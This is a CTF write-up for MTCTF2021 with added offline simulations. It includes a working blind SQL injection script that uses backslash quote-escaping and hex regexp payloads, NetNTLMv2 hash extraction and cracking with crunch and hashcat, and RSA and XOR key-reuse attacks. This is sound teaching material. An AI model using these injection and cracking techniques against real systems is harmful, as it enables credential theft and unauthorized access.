
MTCTF2021 Partial Write-Up

Timeline Sec
Published 2021-06-25 11:36:59
Collected in the Timeline Sec column

MTCTF

Web

★sql

Quotes are blacklisted. Put a single backslash in username: it escapes the quote that was meant to close the username literal, so the SQL string runs on into the password field and whatever follows there is executed as SQL. That gives a boolean blind injection: the password field carries `||<expr> regexp binary 0x<hex>#`, where the pattern is a hex literal (so it needs no quotes), anchored with `^` and extended one character at a time. Characters that are regex metacharacters (`$ . * + ? ^` and so on) are skipped so they are not interpreted as pattern syntax:

```python
import requests
import time


def str2int(mystr):
    """Big-endian integer of the string's bytes, so hex(str2int('^a')) == '0x5e61'."""
    return int.from_bytes(mystr.encode(), 'big')


sess = requests.Session()
url = 'http://eci-2zea89kqieujgo38pawk.cloudeci1.ichunqiu.com/index.php'
f = '账号或密码错误'  # text the page contains when the condition is false ("wrong username or password")
y = 'flag is not here'  # text the page contains when the condition is true
start = 0  # position to start from
strlen = 80  # maximum length of the string being extracted
sleep_time = 0
ostr = '^'  # the regex is anchored to the start of the value
# str2find = '(database())'  # CTF
# str2find = 'password'  # This_1s_thE_Passw0rd
str2find = 'username'
# str2find = '(select flag from flag)'  # expression or subquery to extract; may need parentheses
# str2find = '(select `2` from (select 1,2 union select * from user)a limit 1,1)'
# regex metacharacters; appending one of these would change the pattern's meaning, so skip them
skip = set('$.*+?^()[]{}|\\')
for j in range(start, start + strlen):
    for i in range(32, 127):  # printable ASCII
        if chr(i) in skip:
            continue
        time.sleep(sleep_time)
        temp_str = ostr + chr(i)
        # the pattern is sent as a hex literal, e.g. regexp binary 0x5e61 for '^a', so no quotes are needed
        ent = '{} regexp binary {}'.format(str2find, hex(str2int(temp_str)))  # condition to test
        payload = "||{}#".format(ent)  # injected through the password field
        data = {
            'username': '\\',  # backslash swallows the quote that should close the username literal
            'password': payload.replace(' ', '/**/')  # spaces are filtered; use comments instead
        }
        sess.get(url)
        res = sess.post(url, data=data)
        res.encoding = res.apparent_encoding  # the page is Chinese; decode it properly
        text = res.text
        if f in text:
            continue
        elif y in text:
            ostr += chr(i)
            print(ostr, j)
            break
        else:  # neither marker present: unexpected response
            print('error:', text)
            break
print(ostr)
```

Once the password has been dumped, log in with it to get the flag.
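The mechanics above, simulated offline as an added example that is not part of the write-up: `build_query` shows the statement a naive string-concatenating login would assemble (the challenge's real query is not on the page, so its exact shape is an assumption), `build_payload` produces the same `||<column> regexp binary 0x...#` payload as the script, and `local_oracle` stands in for the web application by testing the pattern against a constructed secret. It also goes one step beyond the script: instead of skipping regex metacharacters it backslash-escapes them, so values containing `.`, `$` or `^` are recovered too. That relies on MySQL's REGEXP honouring backslash escapes when the pattern arrives as a hex literal (no SQL string escaping applies on that path), which holds for the Henry Spencer engine in 5.x and ICU in 8.0 as far as I know, but treat it as an assumption; the simulation uses Python's `re`.

```python
import re

# Constructed secret for the offline simulation. The real target answered with the
# "账号或密码错误" / "flag is not here" pages instead of a boolean.
SECRET = "Th1s.1s_$ecret^"

# Characters that mean something to the regex engine. Escaping them (rather than
# skipping them as the script above does) lets the extraction recover them.
# Assumption: MySQL REGEXP accepts '\.' etc. in a hex-literal pattern.
REGEX_META = set(r"\.^$*+?()[]{}|")


def escape_regex(prefix: str) -> str:
    return "".join("\\" + ch if ch in REGEX_META else ch for ch in prefix)


def build_payload(column: str, prefix: str) -> str:
    """Password-field value: '||<column> regexp binary 0x<hex>#', spaces replaced by /**/."""
    pattern = "^" + escape_regex(prefix)           # anchored prefix test, as in the script
    hexlit = "0x" + pattern.encode().hex()         # hex literal: no quotes needed
    return "||{} regexp binary {}#".format(column, hexlit).replace(" ", "/**/")


def build_query(username: str, password: str) -> str:
    """The statement a naive PHP login would concatenate (assumed form, not the challenge source)."""
    return "SELECT * FROM user WHERE username='{}' AND password='{}'".format(username, password)


def local_oracle(query: str) -> bool:
    """Stand-in for the web app: pull the hex pattern out of the query and test it on SECRET."""
    m = re.search(r"regexp/\*\*/binary/\*\*/0x([0-9a-fA-F]+)#", query)
    if not m:
        return False
    pattern = bytes.fromhex(m.group(1)).decode()
    return re.search(pattern, SECRET) is not None  # 'binary' => case-sensitive, like re


def extract(column: str, oracle, max_len: int = 80) -> str:
    """Grow the matched prefix one printable character at a time until nothing extends it."""
    prefix = ""
    while len(prefix) < max_len:
        for code in range(32, 127):               # printable ASCII, no characters skipped
            candidate = prefix + chr(code)
            query = build_query("\\", build_payload(column, candidate))
            if oracle(query):
                prefix = candidate
                break
        else:                                     # no character extends the prefix: done
            break
    return prefix


if __name__ == "__main__":
    print(build_query("\\", build_payload("username", "a")))
    print(extract("password", local_oracle))
```

The first print shows why the backslash matters: the username literal becomes `'\' AND password='`, leaving `||username/**/regexp/**/binary/**/0x5e61#` as live SQL.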

Misc

★Misc1

We get a VHD file; 360Zip extracts it directly.

Inside is a pile of fragments that look like pieces of a barcode. Concatenating them in the default order

gives a meaningless blob.

Guessing that the right order is the order of the sectors on disk, load the VHD into WinHex.

Sorting by sector and re-assembling by hand yields the image.

Scanning the code gives the text EuO9&cDH; open flag.exe, which asks for exactly this as its key.

Enter it to get flag.txt.

★Misc3

NTLMv2 request flow:

1. The client sends a request containing the login username in clear text. The server already holds each login user's password hash.
2. The server generates an 8-byte random value (the Server Challenge; 16 hex digits in the capture) and sends it back in clear. It can compute the expected answer itself from the stored hash (call it Challenge1).
3. The client derives the NTLMv2 key from the password hash and computes an HMAC-MD5 over the Server Challenge together with a blob it builds (timestamp, client nonce, target information). This result, Challenge2, is the response, and it is sent to the server.
4. The server compares Challenge1 with the received response; if they match, authentication succeeds.

The NetNTLMv2 format is:

username::domain:challenge:HMAC-MD5:blob

- username: nanming
- domain: MicrosoftAccount (taken from the packet; for local accounts it may be an IP or machine name)
- challenge: the NTLM Server Challenge, 6a99833ddd690e7a
- HMAC-MD5: the NTProofStr field in the packet, 980a5dc38aaff466c367eff70bcf80cb
- blob: the remainder of the NTLMv2 response after NTProofStr; it is the long trailing hex field in the hashcat command below

From the capture's file name we know the password is eight characters, the first four being "pass", so we generate the candidate list with crunch and try to crack it:

```shell
crunch 8 8 -t pass%%%% >> 1.txt
hashcat -m 5600 nanming::MicrosoftAccount:6a99833ddd690e7a:980a5dc38aaff466c367eff70bcf80cb:010100000000000042325524355ed601421cb509516bc2e90000000002001e00570049004e002d004f004d004b004100540046003300520047004a00470001001e00570049004e002d004f004d004b004100540046003300520047004a00470004001e00570049004e002d004f004d004b004100540046003300520047004a00470003001e00570049004e002d004f004d004b004100540046003300520047004a0047000700080042325524355ed6010600040002000000080030003000000000000000010000000020000011ac824d212777625c616fadbb6dd0dfaf35a8e4d93f7960ec1eac5592e7cfde0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00330031002e00370035000000000000000000 /root/1.txt -o found.txt --force
```

`-m 5600` selects the NetNTLMv2 hash mode; `--force` makes hashcat run despite device warnings (fine for a lab VM, not something to rely on elsewhere). Output:

```text
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Common KVM processor, 5844/5908 MB (2048 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache hit:
* Filename..: /root/1.txt
* Passwords.: 10001
* Bytes.....: 90008
* Keyspace..: 10001

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: NANMING::MicrosoftAccount:6a99833ddd690e7a:980a5dc3...000000
Time.Started.....: Sun May 23 18:29:23 2021, (0 secs)
Time.Estimated...: Sun May 23 18:29:23 2021, (0 secs)
Guess.Base.......: File (/root/1.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 42913 H/s (5.34ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4096/10001 (40.96%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 0/10001 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: pass0000 -> pass4094

Started: Sun May 23 18:29:20 2021
Stopped: Sun May 23 18:29:25 2021

┌──(root㉿kali)-[~]
└─# cat found.txt
NANMING::MicrosoftAccount:6a99833ddd690e7a:980a5dc38aaff466c367eff70bcf80cb:<blob>:pass1952
```

(The blob in found.txt is the same hex as in the command and is elided here.) The password is pass1952.

Crypto

★easy_RSA

Given: n, e = 3, and the encryptions of m and m+1, c1 = m^3 mod n and c2 = (m+1)^3 mod n. Their difference is c2 - c1 = 3m^2 + 3m + 1, so m is the positive root of 3m^2 + 3m + (1 - (c2 - c1)) = 0 and follows from the quadratic formula. Subtracting the ciphertexts as plain integers only works when both reductions mod n dropped the same multiple of n; the long common prefix of c1 and c2 shows that this is the case here.

EXP (Python):

```python
import gmpy2
from libnum import n2s

n = int("0x9371c61a2b760109781f229d43c6f05b58de65aa2a674ff92334cb5219132448d72c1293c145eb6f35e58791669f2d8d3b6ce506f4b3543beb947cf119f463a00bd33a33c4d566c4fd3f4c73c697fa5f3bf65976284b9cc96ec817241385d480003cdda9649fa0995b013e66f583c9a9710f7e18396fbf461cb31720f94a0f79", 16)
e = 3
c1 = int("0x5f4e03f28702208b215f39f1c8598b77074bfa238dfb9ce424af7cc8a61f7ea48ffbbd5a5e1a10f686c3f240e85d011f6c8b968d1d607b2e1d5a78ad6947b7d3ec8f33ad32489befab601fe745164e4ff4aed7630da89af7f902f6a1bf7266c9c95b29f2c69c33b93a709f282d43b10c61b1a1fe76f5fee970780d7512389fd1", 16)  # m^3 mod n
c2 = int("0x5f4e03f28702208b215f39f1c8598b77074bfa238dfb9ce424af7cc8a61f7ea48ffc5c26b0c12bcff9f697f274f59f0e55a147768332fc1f1bac5bbc8f9bb508104f232bdd20091d26adc52e36feda4a156eae7dce4650f83fabc828fdcfb01d25efb98db8b94811ca855a6aa77caff991e7b986db844ff7a140218449aaa7e8", 16)  # (m+1)^3 mod n
# c2 - c1 = 3m^2 + 3m + 1, so solve 3m^2 + 3m + (1 - (c2 - c1)) = 0 for m
a = 3
b = 3
c = c1 - c2 + 1
det, exact = gmpy2.iroot(b**2 - 4*a*c, 2)  # iroot returns (root, is_exact)
assert exact  # otherwise c2 - c1 is not 3m^2 + 3m + 1 and the integer shortcut does not apply
# for these values the write-up reports
# det = 419924980211305067664086451929469473556246023638897570322178499116255792376077397263806409834463657927723353414807
solu = (det - b) // (2*a)  # positive root of the quadratic
print(n2s(int(solu)))
```

This gives the archive password:

the key is : everything_is_easy_in_this_question
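The same two ciphertexts solved modulo n, as an added example that is not part of the write-up. The exploit above subtracts the ciphertexts as integers, which only works when the two reductions mod n dropped the same multiple of n; that is why c1 and c2 share their leading digits here, even though m^3 itself is larger than n for this m, so the cubes did wrap. The closed form below is the standard Franklin-Reiter result for e = 3 and difference 1, needs no square root and no such luck. The small primes and message in `demo_with_wraparound` are constructed.

```python
import math

# Modulus and ciphertexts from the challenge (same values as the exploit above).
N = int("0x9371c61a2b760109781f229d43c6f05b58de65aa2a674ff92334cb5219132448d72c1293c145eb6f35e58791669f2d8d3b6ce506f4b3543beb947cf119f463a00bd33a33c4d566c4fd3f4c73c697fa5f3bf65976284b9cc96ec817241385d480003cdda9649fa0995b013e66f583c9a9710f7e18396fbf461cb31720f94a0f79", 16)
C_M = int("0x5f4e03f28702208b215f39f1c8598b77074bfa238dfb9ce424af7cc8a61f7ea48ffbbd5a5e1a10f686c3f240e85d011f6c8b968d1d607b2e1d5a78ad6947b7d3ec8f33ad32489befab601fe745164e4ff4aed7630da89af7f902f6a1bf7266c9c95b29f2c69c33b93a709f282d43b10c61b1a1fe76f5fee970780d7512389fd1", 16)   # m^3 mod n
C_M1 = int("0x5f4e03f28702208b215f39f1c8598b77074bfa238dfb9ce424af7cc8a61f7ea48ffc5c26b0c12bcff9f697f274f59f0e55a147768332fc1f1bac5bbc8f9bb508104f232bdd20091d26adc52e36feda4a156eae7dce4650f83fabc828fdcfb01d25efb98db8b94811ca855a6aa77caff991e7b986db844ff7a140218449aaa7e8", 16)  # (m+1)^3 mod n


def recover_m(n: int, c_m: int, c_m1: int) -> int:
    """Franklin-Reiter for e = 3 with known difference 1, done modulo n.

    Modulo n:  c_m1 - c_m      = 3m^2 + 3m + 1
               c_m1 + 2c_m - 1 = 3m^3 + 3m^2 + 3m = 3m (m^2 + m + 1)
               c_m1 - c_m + 2  = 3 (m^2 + m + 1)
    so m = (c_m1 + 2c_m - 1) * (c_m1 - c_m + 2)^-1  (mod n).
    """
    num = (c_m1 + 2 * c_m - 1) % n
    den = (c_m1 - c_m + 2) % n
    g = math.gcd(den, n)
    if g != 1:  # practically never, and if it happens you have factored n instead
        raise ValueError("denominator shares factor %d with n" % g)
    return num * pow(den, -1, n) % n


def int_to_bytes(m: int) -> bytes:
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def integer_shortcut_holds(n: int, c_m: int, c_m1: int, m: int) -> bool:
    """True when the write-up's integer subtraction would have worked for these ciphertexts."""
    return c_m1 - c_m == 3 * m * m + 3 * m + 1


def demo_with_wraparound() -> bool:
    """Constructed toy instance where 3m^2 > n, so the integer shortcut cannot work."""
    p, q = 1000000007, 998244353    # constructed primes, both 2 mod 3, so e = 3 is a valid exponent
    n = p * q                       # about 1e18
    m = 987654321                   # 3m^2 is about 2.9e18 > n, and m^3 is far above n
    c_m, c_m1 = pow(m, 3, n), pow(m + 1, 3, n)
    assert not integer_shortcut_holds(n, c_m, c_m1, m)
    return recover_m(n, c_m, c_m1) == m


if __name__ == "__main__":
    m = recover_m(N, C_M, C_M1)
    print(int_to_bytes(m))
    print("cubes wrapped:", m ** 3 > N, " integer shortcut held:", integer_shortcut_holds(N, C_M, C_M1, m))
    print("toy with wraparound recovered:", demo_with_wraparound())
```

The check `pow(m, 3, N) == C_M` is the honest way to confirm a recovered m; decoding to readable text is only a hint.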

The file extracted from the archive is then broken with an XOR key-reuse attack on the ciphertext,

giving flag{it_1s_P@dd1n_@nd_p@d}
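The XOR key-reuse step as an added, constructed example, since the write-up does not show the ciphertext: two messages XORed with the same key (a many-time pad), and crib dragging over c1 ^ c2 = p1 ^ p2 to locate plaintext and recover key bytes. Key, messages and the crib are all made up.

```python
# Constructed example: one key reused for two messages (a many-time pad).
KEY = bytes.fromhex("3a9f1c7e55d002b8c4e17f0a6b93d8e2f10c5a77e9b03d4c8d21f6e0a5b74c93")
P1 = b"attack the castle at dawn"
P2 = b"bring ladders and torches"


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(plain: bytes, key: bytes) -> bytes:
    return xor_bytes(plain, key)          # the bug is reusing KEY for a second message


C1 = encrypt(P1, KEY)
C2 = encrypt(P2, KEY)


def crib_drag(c1: bytes, c2: bytes, crib: bytes):
    """c1 ^ c2 == p1 ^ p2, so XORing a guessed fragment of one plaintext at every
    offset shows what the other plaintext would contain there; keep offsets that
    decode to printable text for a human to judge."""
    x = xor_bytes(c1, c2)
    hits = []
    for off in range(len(x) - len(crib) + 1):
        guess = xor_bytes(x[off:off + len(crib)], crib)
        if all(32 <= b < 127 for b in guess):
            hits.append((off, guess))
    return hits


def recover_key(c: bytes, known_plain: bytes, offset: int) -> bytes:
    """Once plaintext is confirmed at an offset, those key bytes are simply c ^ p."""
    return xor_bytes(c[offset:offset + len(known_plain)], known_plain)


def decrypt_with_key_fragment(c: bytes, key_fragment: bytes, offset: int) -> bytes:
    return xor_bytes(c[offset:offset + len(key_fragment)], key_fragment)


if __name__ == "__main__":
    for off, guess in crib_drag(C1, C2, b"castle"):
        print(off, guess)                 # offset 11 reads 'rs and', a plausible fragment
    frag = recover_key(C1, b"castle", 11)
    print(decrypt_with_key_fragment(C2, frag, 11))
```

Each confirmed fragment extends the known key; in a CTF the crib is usually the flag format or a repeated header, and the rest is extended word by word.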


We welcome everyone who is passionate about technology.

If, like us, you want to achieve something,

there is unlimited room here for you to grow.

To join the team, send your résumé to 736241063@qq.com

Originally published 2021-05-25 on the Timeline Sec WeChat public account.
